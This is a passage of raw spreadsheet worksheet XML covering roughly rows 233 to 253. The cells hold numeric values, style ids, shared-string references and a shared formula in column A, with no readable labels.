      </c>
      <c r="J233" s="15"/>
      <c r="K233" s="15"/>
      <c r="L233" s="15"/>
      <c r="M233" s="15"/>
      <c r="N233" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O233" s="29">
        <v>1.0</v>
      </c>
      <c r="P233" s="29">
        <v>2.0</v>
      </c>
      <c r="Q233" s="15"/>
      <c r="R233" s="15"/>
      <c r="S233" s="15"/>
      <c r="T233" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U233" s="5"/>
      <c r="V233" s="5"/>
      <c r="W233" s="47"/>
      <c r="X233" s="45"/>
      <c r="Y233" s="45"/>
      <c r="Z233" s="38" t="s">
        <v>1798</v>
      </c>
      <c r="AA233" s="39" t="s">
        <v>1799</v>
      </c>
      <c r="AB233" s="38" t="s">
        <v>1800</v>
      </c>
      <c r="AC233" s="40">
        <v>260522.0</v>
      </c>
      <c r="AD233" s="5"/>
      <c r="AE233" s="14"/>
      <c r="AF233" s="14"/>
    </row>
    <row r="234">
      <c r="A234" s="6">
        <f t="shared" si="1"/>
        <v>0.9490500122</v>
      </c>
      <c r="B234" s="29">
        <v>1.0</v>
      </c>
      <c r="C234" s="15"/>
      <c r="D234" s="14"/>
      <c r="E234" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F234" s="14"/>
      <c r="G234" s="29">
        <v>1.0</v>
      </c>
      <c r="H234" s="29">
        <v>136.0</v>
      </c>
      <c r="I234" s="29">
        <v>24869.0</v>
      </c>
      <c r="J234" s="15"/>
      <c r="K234" s="29">
        <v>24869.0</v>
      </c>
      <c r="L234" s="15"/>
      <c r="M234" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N234" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O234" s="29">
        <v>1.0</v>
      </c>
      <c r="P234" s="29">
        <v>3.0</v>
      </c>
      <c r="Q234" s="15"/>
      <c r="R234" s="15"/>
      <c r="S234" s="15"/>
      <c r="T234" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U234" s="5"/>
      <c r="V234" s="5"/>
      <c r="W234" s="47"/>
      <c r="X234" s="45"/>
      <c r="Y234" s="45"/>
      <c r="Z234" s="38" t="s">
        <v>1801</v>
      </c>
      <c r="AA234" s="39" t="s">
        <v>1802</v>
      </c>
      <c r="AB234" s="38" t="s">
        <v>1803</v>
      </c>
      <c r="AC234" s="40">
        <v>195345.0</v>
      </c>
      <c r="AD234" s="5"/>
      <c r="AE234" s="14"/>
      <c r="AF234" s="14"/>
    </row>
    <row r="235">
      <c r="A235" s="6">
        <f t="shared" si="1"/>
        <v>0.8300777242</v>
      </c>
      <c r="B235" s="29">
        <v>1.0</v>
      </c>
      <c r="C235" s="29">
        <v>184945.0</v>
      </c>
      <c r="D235" s="14"/>
      <c r="E235" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F235" s="14"/>
      <c r="G235" s="29">
        <v>1.0</v>
      </c>
      <c r="H235" s="29">
        <v>692.0</v>
      </c>
      <c r="I235" s="29">
        <v>101985.0</v>
      </c>
      <c r="J235" s="15"/>
      <c r="K235" s="15"/>
      <c r="L235" s="15"/>
      <c r="M235" s="15"/>
      <c r="N235" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O235" s="29">
        <v>1.0</v>
      </c>
      <c r="P235" s="29">
        <v>1.0</v>
      </c>
      <c r="Q235" s="15"/>
      <c r="R235" s="15"/>
      <c r="S235" s="15"/>
      <c r="T235" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U235" s="5"/>
      <c r="V235" s="5"/>
      <c r="W235" s="47"/>
      <c r="X235" s="45"/>
      <c r="Y235" s="45"/>
      <c r="Z235" s="38" t="s">
        <v>1804</v>
      </c>
      <c r="AA235" s="39" t="s">
        <v>1805</v>
      </c>
      <c r="AB235" s="38" t="s">
        <v>1806</v>
      </c>
      <c r="AC235" s="40">
        <v>184935.0</v>
      </c>
      <c r="AD235" s="5"/>
      <c r="AE235" s="14"/>
      <c r="AF235" s="14"/>
    </row>
    <row r="236">
      <c r="A236" s="6">
        <f t="shared" si="1"/>
        <v>0.1177124466</v>
      </c>
      <c r="B236" s="29">
        <v>1.0</v>
      </c>
      <c r="C236" s="15"/>
      <c r="D236" s="14"/>
      <c r="E236" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F236" s="14"/>
      <c r="G236" s="29">
        <v>3.0</v>
      </c>
      <c r="H236" s="29">
        <v>136.0</v>
      </c>
      <c r="I236" s="29">
        <v>104927.0</v>
      </c>
      <c r="J236" s="15"/>
      <c r="K236" s="15"/>
      <c r="L236" s="15"/>
      <c r="M236" s="14"/>
      <c r="N236" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O236" s="29">
        <v>1.0</v>
      </c>
      <c r="P236" s="29">
        <v>0.0</v>
      </c>
      <c r="Q236" s="29">
        <v>0.0</v>
      </c>
      <c r="R236" s="15"/>
      <c r="S236" s="15"/>
      <c r="T236" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U236" s="5"/>
      <c r="V236" s="5"/>
      <c r="W236" s="47"/>
      <c r="X236" s="45"/>
      <c r="Y236" s="45"/>
      <c r="Z236" s="38" t="s">
        <v>1807</v>
      </c>
      <c r="AA236" s="39" t="s">
        <v>1808</v>
      </c>
      <c r="AB236" s="38" t="s">
        <v>1809</v>
      </c>
      <c r="AC236" s="40">
        <v>117936.0</v>
      </c>
      <c r="AD236" s="5"/>
      <c r="AE236" s="14"/>
      <c r="AF236" s="14"/>
    </row>
    <row r="237">
      <c r="A237" s="6">
        <f t="shared" si="1"/>
        <v>0.6248430565</v>
      </c>
      <c r="B237" s="29">
        <v>1.0</v>
      </c>
      <c r="C237" s="15"/>
      <c r="D237" s="14"/>
      <c r="E237" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F237" s="14"/>
      <c r="G237" s="29">
        <v>0.0</v>
      </c>
      <c r="H237" s="29">
        <v>605.0</v>
      </c>
      <c r="I237" s="29">
        <v>50314.0</v>
      </c>
      <c r="J237" s="15"/>
      <c r="K237" s="15"/>
      <c r="L237" s="15"/>
      <c r="M237" s="15"/>
      <c r="N237" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O237" s="29">
        <v>2.0</v>
      </c>
      <c r="P237" s="29">
        <v>2.0</v>
      </c>
      <c r="Q237" s="15"/>
      <c r="R237" s="15"/>
      <c r="S237" s="15"/>
      <c r="T237" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U237" s="5"/>
      <c r="V237" s="5"/>
      <c r="W237" s="47"/>
      <c r="X237" s="45"/>
      <c r="Y237" s="45"/>
      <c r="Z237" s="38" t="s">
        <v>1810</v>
      </c>
      <c r="AA237" s="39" t="s">
        <v>1811</v>
      </c>
      <c r="AB237" s="38" t="s">
        <v>1812</v>
      </c>
      <c r="AC237" s="40">
        <v>62356.0</v>
      </c>
      <c r="AD237" s="5"/>
      <c r="AE237" s="14"/>
      <c r="AF237" s="14"/>
    </row>
    <row r="238">
      <c r="A238" s="6">
        <f t="shared" si="1"/>
        <v>0.7895168949</v>
      </c>
      <c r="B238" s="29">
        <v>1.0</v>
      </c>
      <c r="C238" s="15"/>
      <c r="D238" s="14"/>
      <c r="E238" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F238" s="14"/>
      <c r="G238" s="29">
        <v>6.0</v>
      </c>
      <c r="H238" s="29">
        <v>421.0</v>
      </c>
      <c r="I238" s="29">
        <v>453.0</v>
      </c>
      <c r="J238" s="15"/>
      <c r="K238" s="29">
        <v>-1.0</v>
      </c>
      <c r="L238" s="15"/>
      <c r="M238" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N238" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O238" s="29">
        <v>2.0</v>
      </c>
      <c r="P238" s="29">
        <v>1.0</v>
      </c>
      <c r="Q238" s="15"/>
      <c r="R238" s="15"/>
      <c r="S238" s="15"/>
      <c r="T238" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U238" s="5"/>
      <c r="V238" s="5"/>
      <c r="W238" s="45"/>
      <c r="X238" s="45"/>
      <c r="Y238" s="45"/>
      <c r="Z238" s="38" t="s">
        <v>1813</v>
      </c>
      <c r="AA238" s="39" t="s">
        <v>1814</v>
      </c>
      <c r="AB238" s="38" t="s">
        <v>1815</v>
      </c>
      <c r="AC238" s="40">
        <v>5174.0</v>
      </c>
      <c r="AD238" s="5"/>
      <c r="AE238" s="14"/>
      <c r="AF238" s="14"/>
    </row>
    <row r="239">
      <c r="A239" s="6">
        <f t="shared" si="1"/>
        <v>0.7513896942</v>
      </c>
      <c r="B239" s="29">
        <v>1.0</v>
      </c>
      <c r="C239" s="15"/>
      <c r="D239" s="14"/>
      <c r="E239" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F239" s="14"/>
      <c r="G239" s="29">
        <v>0.0</v>
      </c>
      <c r="H239" s="29">
        <v>272.0</v>
      </c>
      <c r="I239" s="29">
        <v>201628.0</v>
      </c>
      <c r="J239" s="15"/>
      <c r="K239" s="29">
        <v>201628.0</v>
      </c>
      <c r="L239" s="15"/>
      <c r="M239" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N239" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O239" s="29">
        <v>1.0</v>
      </c>
      <c r="P239" s="29">
        <v>12.0</v>
      </c>
      <c r="Q239" s="15"/>
      <c r="R239" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S239" s="15"/>
      <c r="T239" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U239" s="5"/>
      <c r="V239" s="5"/>
      <c r="W239" s="47"/>
      <c r="X239" s="45"/>
      <c r="Y239" s="45"/>
      <c r="Z239" s="38" t="s">
        <v>1816</v>
      </c>
      <c r="AA239" s="39" t="s">
        <v>1817</v>
      </c>
      <c r="AB239" s="38" t="s">
        <v>1818</v>
      </c>
      <c r="AC239" s="40">
        <v>205162.0</v>
      </c>
      <c r="AD239" s="5"/>
      <c r="AE239" s="14"/>
      <c r="AF239" s="14"/>
    </row>
    <row r="240">
      <c r="A240" s="6">
        <f t="shared" si="1"/>
        <v>0.03595204196</v>
      </c>
      <c r="B240" s="29">
        <v>1.0</v>
      </c>
      <c r="C240" s="14"/>
      <c r="D240" s="14"/>
      <c r="E240" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F240" s="14"/>
      <c r="G240" s="29">
        <v>0.0</v>
      </c>
      <c r="H240" s="29">
        <v>119.0</v>
      </c>
      <c r="I240" s="29">
        <v>209428.0</v>
      </c>
      <c r="J240" s="15"/>
      <c r="K240" s="29">
        <v>209428.0</v>
      </c>
      <c r="L240" s="15"/>
      <c r="M240" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N240" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O240" s="29">
        <v>1.0</v>
      </c>
      <c r="P240" s="29">
        <v>0.0</v>
      </c>
      <c r="Q240" s="15"/>
      <c r="R240" s="15"/>
      <c r="S240" s="15"/>
      <c r="T240" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U240" s="5"/>
      <c r="V240" s="5"/>
      <c r="W240" s="47"/>
      <c r="X240" s="45"/>
      <c r="Y240" s="45"/>
      <c r="Z240" s="38" t="s">
        <v>1819</v>
      </c>
      <c r="AA240" s="39" t="s">
        <v>1820</v>
      </c>
      <c r="AB240" s="38" t="s">
        <v>1821</v>
      </c>
      <c r="AC240" s="40">
        <v>249135.0</v>
      </c>
      <c r="AD240" s="5"/>
      <c r="AE240" s="14"/>
      <c r="AF240" s="14"/>
    </row>
    <row r="241">
      <c r="A241" s="6">
        <f t="shared" si="1"/>
        <v>0.1132803391</v>
      </c>
      <c r="B241" s="29">
        <v>1.0</v>
      </c>
      <c r="C241" s="15"/>
      <c r="D241" s="14"/>
      <c r="E241" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F241" s="14"/>
      <c r="G241" s="29">
        <v>-1.0</v>
      </c>
      <c r="H241" s="29">
        <v>90.0</v>
      </c>
      <c r="I241" s="29">
        <v>110499.0</v>
      </c>
      <c r="J241" s="15"/>
      <c r="K241" s="15"/>
      <c r="L241" s="15"/>
      <c r="M241" s="14"/>
      <c r="N241" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O241" s="29">
        <v>1.0</v>
      </c>
      <c r="P241" s="29">
        <v>1.0</v>
      </c>
      <c r="Q241" s="15"/>
      <c r="R241" s="15"/>
      <c r="S241" s="15"/>
      <c r="T241" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U241" s="5"/>
      <c r="V241" s="5"/>
      <c r="W241" s="47"/>
      <c r="X241" s="45"/>
      <c r="Y241" s="45"/>
      <c r="Z241" s="38" t="s">
        <v>1822</v>
      </c>
      <c r="AA241" s="39" t="s">
        <v>1823</v>
      </c>
      <c r="AB241" s="38" t="s">
        <v>1824</v>
      </c>
      <c r="AC241" s="40">
        <v>193087.0</v>
      </c>
      <c r="AD241" s="5"/>
      <c r="AE241" s="14"/>
      <c r="AF241" s="14"/>
    </row>
    <row r="242">
      <c r="A242" s="6">
        <f t="shared" si="1"/>
        <v>0.0541139516</v>
      </c>
      <c r="B242" s="29">
        <v>1.0</v>
      </c>
      <c r="C242" s="15"/>
      <c r="D242" s="14"/>
      <c r="E242" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F242" s="14"/>
      <c r="G242" s="29">
        <v>4.0</v>
      </c>
      <c r="H242" s="29">
        <v>290.0</v>
      </c>
      <c r="I242" s="29">
        <v>119415.0</v>
      </c>
      <c r="J242" s="15"/>
      <c r="K242" s="15"/>
      <c r="L242" s="15"/>
      <c r="M242" s="14"/>
      <c r="N242" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O242" s="29">
        <v>2.0</v>
      </c>
      <c r="P242" s="29">
        <v>0.0</v>
      </c>
      <c r="Q242" s="15"/>
      <c r="R242" s="15"/>
      <c r="S242" s="15"/>
      <c r="T242" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U242" s="5"/>
      <c r="V242" s="5"/>
      <c r="W242" s="47"/>
      <c r="X242" s="45"/>
      <c r="Y242" s="45"/>
      <c r="Z242" s="38" t="s">
        <v>1825</v>
      </c>
      <c r="AA242" s="39" t="s">
        <v>1826</v>
      </c>
      <c r="AB242" s="38" t="s">
        <v>1827</v>
      </c>
      <c r="AC242" s="40">
        <v>131854.0</v>
      </c>
      <c r="AD242" s="5"/>
      <c r="AE242" s="14"/>
      <c r="AF242" s="14"/>
    </row>
    <row r="243">
      <c r="A243" s="6">
        <f t="shared" si="1"/>
        <v>0.73400437</v>
      </c>
      <c r="B243" s="29">
        <v>1.0</v>
      </c>
      <c r="C243" s="29">
        <v>131355.0</v>
      </c>
      <c r="D243" s="14"/>
      <c r="E243" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F243" s="14"/>
      <c r="G243" s="29">
        <v>24.0</v>
      </c>
      <c r="H243" s="29">
        <v>5644.0</v>
      </c>
      <c r="I243" s="29">
        <v>69237.0</v>
      </c>
      <c r="J243" s="15"/>
      <c r="K243" s="29">
        <v>69237.0</v>
      </c>
      <c r="L243" s="15"/>
      <c r="M243" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N243" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O243" s="29">
        <v>1.0</v>
      </c>
      <c r="P243" s="29">
        <v>4.0</v>
      </c>
      <c r="Q243" s="15"/>
      <c r="R243" s="15"/>
      <c r="S243" s="15"/>
      <c r="T243" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U243" s="5"/>
      <c r="V243" s="5"/>
      <c r="W243" s="47"/>
      <c r="X243" s="45"/>
      <c r="Y243" s="45"/>
      <c r="Z243" s="38" t="s">
        <v>1828</v>
      </c>
      <c r="AA243" s="39" t="s">
        <v>1829</v>
      </c>
      <c r="AB243" s="38" t="s">
        <v>1830</v>
      </c>
      <c r="AC243" s="40">
        <v>131353.0</v>
      </c>
      <c r="AD243" s="5"/>
      <c r="AE243" s="14"/>
      <c r="AF243" s="14"/>
    </row>
    <row r="244">
      <c r="A244" s="6">
        <f t="shared" si="1"/>
        <v>0.5992862212</v>
      </c>
      <c r="B244" s="29">
        <v>1.0</v>
      </c>
      <c r="C244" s="29">
        <v>165808.0</v>
      </c>
      <c r="D244" s="14"/>
      <c r="E244" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F244" s="14"/>
      <c r="G244" s="29">
        <v>0.0</v>
      </c>
      <c r="H244" s="29">
        <v>563.0</v>
      </c>
      <c r="I244" s="29">
        <v>122449.0</v>
      </c>
      <c r="J244" s="15"/>
      <c r="K244" s="29">
        <v>151946.0</v>
      </c>
      <c r="L244" s="15"/>
      <c r="M244" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N244" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O244" s="29">
        <v>1.0</v>
      </c>
      <c r="P244" s="29">
        <v>0.0</v>
      </c>
      <c r="Q244" s="15"/>
      <c r="R244" s="15"/>
      <c r="S244" s="15"/>
      <c r="T244" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U244" s="5"/>
      <c r="V244" s="5"/>
      <c r="W244" s="47"/>
      <c r="X244" s="45"/>
      <c r="Y244" s="45"/>
      <c r="Z244" s="38" t="s">
        <v>1831</v>
      </c>
      <c r="AA244" s="39" t="s">
        <v>1832</v>
      </c>
      <c r="AB244" s="38" t="s">
        <v>1833</v>
      </c>
      <c r="AC244" s="40">
        <v>165807.0</v>
      </c>
      <c r="AD244" s="5"/>
      <c r="AE244" s="14"/>
      <c r="AF244" s="14"/>
    </row>
    <row r="245">
      <c r="A245" s="6">
        <f t="shared" si="1"/>
        <v>0.2609751438</v>
      </c>
      <c r="B245" s="29">
        <v>1.0</v>
      </c>
      <c r="C245" s="14"/>
      <c r="D245" s="14"/>
      <c r="E245" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F245" s="14"/>
      <c r="G245" s="29">
        <v>1.0</v>
      </c>
      <c r="H245" s="29">
        <v>380.0</v>
      </c>
      <c r="I245" s="29">
        <v>110499.0</v>
      </c>
      <c r="J245" s="15"/>
      <c r="K245" s="15"/>
      <c r="L245" s="15"/>
      <c r="M245" s="15"/>
      <c r="N245" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O245" s="29">
        <v>0.0</v>
      </c>
      <c r="P245" s="29">
        <v>1.0</v>
      </c>
      <c r="Q245" s="15"/>
      <c r="R245" s="15"/>
      <c r="S245" s="15"/>
      <c r="T245" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U245" s="5"/>
      <c r="V245" s="5"/>
      <c r="W245" s="47"/>
      <c r="X245" s="45"/>
      <c r="Y245" s="45"/>
      <c r="Z245" s="38" t="s">
        <v>1834</v>
      </c>
      <c r="AA245" s="39" t="s">
        <v>1835</v>
      </c>
      <c r="AB245" s="38" t="s">
        <v>1836</v>
      </c>
      <c r="AC245" s="40">
        <v>190235.0</v>
      </c>
      <c r="AD245" s="5"/>
      <c r="AE245" s="14"/>
      <c r="AF245" s="14"/>
    </row>
    <row r="246">
      <c r="A246" s="6">
        <f t="shared" si="1"/>
        <v>0.2996474044</v>
      </c>
      <c r="B246" s="29">
        <v>1.0</v>
      </c>
      <c r="C246" s="14"/>
      <c r="D246" s="14"/>
      <c r="E246" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F246" s="14"/>
      <c r="G246" s="29">
        <v>0.0</v>
      </c>
      <c r="H246" s="29">
        <v>93.0</v>
      </c>
      <c r="I246" s="29">
        <v>120489.0</v>
      </c>
      <c r="J246" s="15"/>
      <c r="K246" s="15"/>
      <c r="L246" s="15"/>
      <c r="M246" s="14"/>
      <c r="N246" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O246" s="29">
        <v>0.0</v>
      </c>
      <c r="P246" s="29">
        <v>4.0</v>
      </c>
      <c r="Q246" s="15"/>
      <c r="R246" s="15"/>
      <c r="S246" s="15"/>
      <c r="T246" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U246" s="5"/>
      <c r="V246" s="5"/>
      <c r="W246" s="47"/>
      <c r="X246" s="45"/>
      <c r="Y246" s="45"/>
      <c r="Z246" s="38" t="s">
        <v>1837</v>
      </c>
      <c r="AA246" s="39" t="s">
        <v>1838</v>
      </c>
      <c r="AB246" s="38" t="s">
        <v>1839</v>
      </c>
      <c r="AC246" s="40">
        <v>132925.0</v>
      </c>
      <c r="AD246" s="5"/>
      <c r="AE246" s="14"/>
      <c r="AF246" s="14"/>
    </row>
    <row r="247">
      <c r="A247" s="6">
        <f t="shared" si="1"/>
        <v>0.6822137354</v>
      </c>
      <c r="B247" s="29">
        <v>1.0</v>
      </c>
      <c r="C247" s="14"/>
      <c r="D247" s="14"/>
      <c r="E247" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F247" s="14"/>
      <c r="G247" s="29">
        <v>3.0</v>
      </c>
      <c r="H247" s="29">
        <v>1818.0</v>
      </c>
      <c r="I247" s="29">
        <v>133248.0</v>
      </c>
      <c r="J247" s="15"/>
      <c r="K247" s="29">
        <v>2138.0</v>
      </c>
      <c r="L247" s="15"/>
      <c r="M247" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N247" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O247" s="29">
        <v>1.0</v>
      </c>
      <c r="P247" s="29">
        <v>3.0</v>
      </c>
      <c r="Q247" s="29">
        <v>0.0</v>
      </c>
      <c r="R247" s="15"/>
      <c r="S247" s="15"/>
      <c r="T247" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U247" s="5"/>
      <c r="V247" s="5"/>
      <c r="W247" s="47"/>
      <c r="X247" s="45"/>
      <c r="Y247" s="45"/>
      <c r="Z247" s="38" t="s">
        <v>1840</v>
      </c>
      <c r="AA247" s="39" t="s">
        <v>1841</v>
      </c>
      <c r="AB247" s="38" t="s">
        <v>1531</v>
      </c>
      <c r="AC247" s="40">
        <v>145171.0</v>
      </c>
      <c r="AD247" s="5"/>
      <c r="AE247" s="14"/>
      <c r="AF247" s="14"/>
    </row>
    <row r="248">
      <c r="A248" s="6">
        <f t="shared" si="1"/>
        <v>0.8743937372</v>
      </c>
      <c r="B248" s="29">
        <v>1.0</v>
      </c>
      <c r="C248" s="29">
        <v>38058.0</v>
      </c>
      <c r="D248" s="14"/>
      <c r="E248" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F248" s="14"/>
      <c r="G248" s="29">
        <v>10.0</v>
      </c>
      <c r="H248" s="29">
        <v>2328.0</v>
      </c>
      <c r="I248" s="29">
        <v>25963.0</v>
      </c>
      <c r="J248" s="15"/>
      <c r="K248" s="29">
        <v>-1.0</v>
      </c>
      <c r="L248" s="15"/>
      <c r="M248" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N248" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O248" s="29">
        <v>4.0</v>
      </c>
      <c r="P248" s="29">
        <v>4.0</v>
      </c>
      <c r="Q248" s="15"/>
      <c r="R248" s="15"/>
      <c r="S248" s="15"/>
      <c r="T248" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U248" s="5"/>
      <c r="V248" s="5"/>
      <c r="W248" s="47"/>
      <c r="X248" s="45"/>
      <c r="Y248" s="45"/>
      <c r="Z248" s="38" t="s">
        <v>1842</v>
      </c>
      <c r="AA248" s="39" t="s">
        <v>1843</v>
      </c>
      <c r="AB248" s="38" t="s">
        <v>1844</v>
      </c>
      <c r="AC248" s="40">
        <v>38037.0</v>
      </c>
      <c r="AD248" s="5"/>
      <c r="AE248" s="14"/>
      <c r="AF248" s="14"/>
    </row>
    <row r="249">
      <c r="A249" s="6">
        <f t="shared" si="1"/>
        <v>0.4886562973</v>
      </c>
      <c r="B249" s="29">
        <v>1.0</v>
      </c>
      <c r="C249" s="29">
        <v>3470.0</v>
      </c>
      <c r="D249" s="14"/>
      <c r="E249" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F249" s="14"/>
      <c r="G249" s="29">
        <v>4.0</v>
      </c>
      <c r="H249" s="29">
        <v>583.0</v>
      </c>
      <c r="I249" s="29">
        <v>2292.0</v>
      </c>
      <c r="J249" s="15"/>
      <c r="K249" s="29">
        <v>86652.0</v>
      </c>
      <c r="L249" s="15"/>
      <c r="M249" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N249" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O249" s="29">
        <v>3.0</v>
      </c>
      <c r="P249" s="29">
        <v>1.0</v>
      </c>
      <c r="Q249" s="15"/>
      <c r="R249" s="15"/>
      <c r="S249" s="15"/>
      <c r="T249" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U249" s="5"/>
      <c r="V249" s="5"/>
      <c r="W249" s="47"/>
      <c r="X249" s="45"/>
      <c r="Y249" s="45"/>
      <c r="Z249" s="38" t="s">
        <v>1845</v>
      </c>
      <c r="AA249" s="39" t="s">
        <v>1846</v>
      </c>
      <c r="AB249" s="38" t="s">
        <v>1847</v>
      </c>
      <c r="AC249" s="40">
        <v>3469.0</v>
      </c>
      <c r="AD249" s="5"/>
      <c r="AE249" s="14"/>
      <c r="AF249" s="14"/>
    </row>
    <row r="250">
      <c r="A250" s="6">
        <f t="shared" si="1"/>
        <v>0.5326421626</v>
      </c>
      <c r="B250" s="29">
        <v>1.0</v>
      </c>
      <c r="C250" s="14"/>
      <c r="D250" s="14"/>
      <c r="E250" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F250" s="14"/>
      <c r="G250" s="29">
        <v>3.0</v>
      </c>
      <c r="H250" s="29">
        <v>182.0</v>
      </c>
      <c r="I250" s="29">
        <v>236065.0</v>
      </c>
      <c r="J250" s="15"/>
      <c r="K250" s="29">
        <v>236065.0</v>
      </c>
      <c r="L250" s="15"/>
      <c r="M250" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N250" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O250" s="29">
        <v>2.0</v>
      </c>
      <c r="P250" s="29">
        <v>0.0</v>
      </c>
      <c r="Q250" s="15"/>
      <c r="R250" s="15"/>
      <c r="S250" s="15"/>
      <c r="T250" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U250" s="5"/>
      <c r="V250" s="5"/>
      <c r="W250" s="47"/>
      <c r="X250" s="45"/>
      <c r="Y250" s="45"/>
      <c r="Z250" s="38" t="s">
        <v>1848</v>
      </c>
      <c r="AA250" s="39" t="s">
        <v>1849</v>
      </c>
      <c r="AB250" s="38" t="s">
        <v>1850</v>
      </c>
      <c r="AC250" s="40">
        <v>232798.0</v>
      </c>
      <c r="AD250" s="5"/>
      <c r="AE250" s="14"/>
      <c r="AF250" s="14"/>
    </row>
    <row r="251">
      <c r="A251" s="6">
        <f t="shared" si="1"/>
        <v>0.9597283241</v>
      </c>
      <c r="B251" s="29">
        <v>1.0</v>
      </c>
      <c r="C251" s="15"/>
      <c r="D251" s="14"/>
      <c r="E251" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F251" s="14"/>
      <c r="G251" s="29">
        <v>8.0</v>
      </c>
      <c r="H251" s="29">
        <v>23736.0</v>
      </c>
      <c r="I251" s="29">
        <v>8335.0</v>
      </c>
      <c r="J251" s="15"/>
      <c r="K251" s="29">
        <v>5501.0</v>
      </c>
      <c r="L251" s="15"/>
      <c r="M251" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N251" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O251" s="29">
        <v>4.0</v>
      </c>
      <c r="P251" s="29">
        <v>1.0</v>
      </c>
      <c r="Q251" s="15"/>
      <c r="R251" s="15"/>
      <c r="S251" s="15"/>
      <c r="T251" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U251" s="5"/>
      <c r="V251" s="5"/>
      <c r="W251" s="47"/>
      <c r="X251" s="45"/>
      <c r="Y251" s="45"/>
      <c r="Z251" s="38" t="s">
        <v>1851</v>
      </c>
      <c r="AA251" s="39" t="s">
        <v>1852</v>
      </c>
      <c r="AB251" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC251" s="40">
        <v>15877.0</v>
      </c>
      <c r="AD251" s="5"/>
      <c r="AE251" s="14"/>
      <c r="AF251" s="14"/>
    </row>
    <row r="252">
      <c r="A252" s="6">
        <f t="shared" si="1"/>
        <v>0.9718704096</v>
      </c>
      <c r="B252" s="29">
        <v>1.0</v>
      </c>
      <c r="C252" s="15"/>
      <c r="D252" s="14"/>
      <c r="E252" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F252" s="14"/>
      <c r="G252" s="29">
        <v>0.0</v>
      </c>
      <c r="H252" s="29">
        <v>1290.0</v>
      </c>
      <c r="I252" s="29">
        <v>122449.0</v>
      </c>
      <c r="J252" s="15"/>
      <c r="K252" s="29">
        <v>6253.0</v>
      </c>
      <c r="L252" s="15"/>
      <c r="M252" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N252" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O252" s="29">
        <v>2.0</v>
      </c>
      <c r="P252" s="29">
        <v>7.0</v>
      </c>
      <c r="Q252" s="15"/>
      <c r="R252" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S252" s="15"/>
      <c r="T252" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U252" s="5"/>
      <c r="V252" s="5"/>
      <c r="W252" s="47"/>
      <c r="X252" s="45"/>
      <c r="Y252" s="45"/>
      <c r="Z252" s="38" t="s">
        <v>1853</v>
      </c>
      <c r="AA252" s="39" t="s">
        <v>1854</v>
      </c>
      <c r="AB252" s="38" t="s">
        <v>1855</v>
      </c>
      <c r="AC252" s="40">
        <v>171599.0</v>
      </c>
      <c r="AD252" s="5"/>
      <c r="AE252" s="14"/>
      <c r="AF252" s="14"/>
    </row>
    <row r="253">
      <c r="A253" s="6">
        <f t="shared" si="1"/>
        <v>0.05885328763</v>
      </c>
      <c r="B253" s="29">
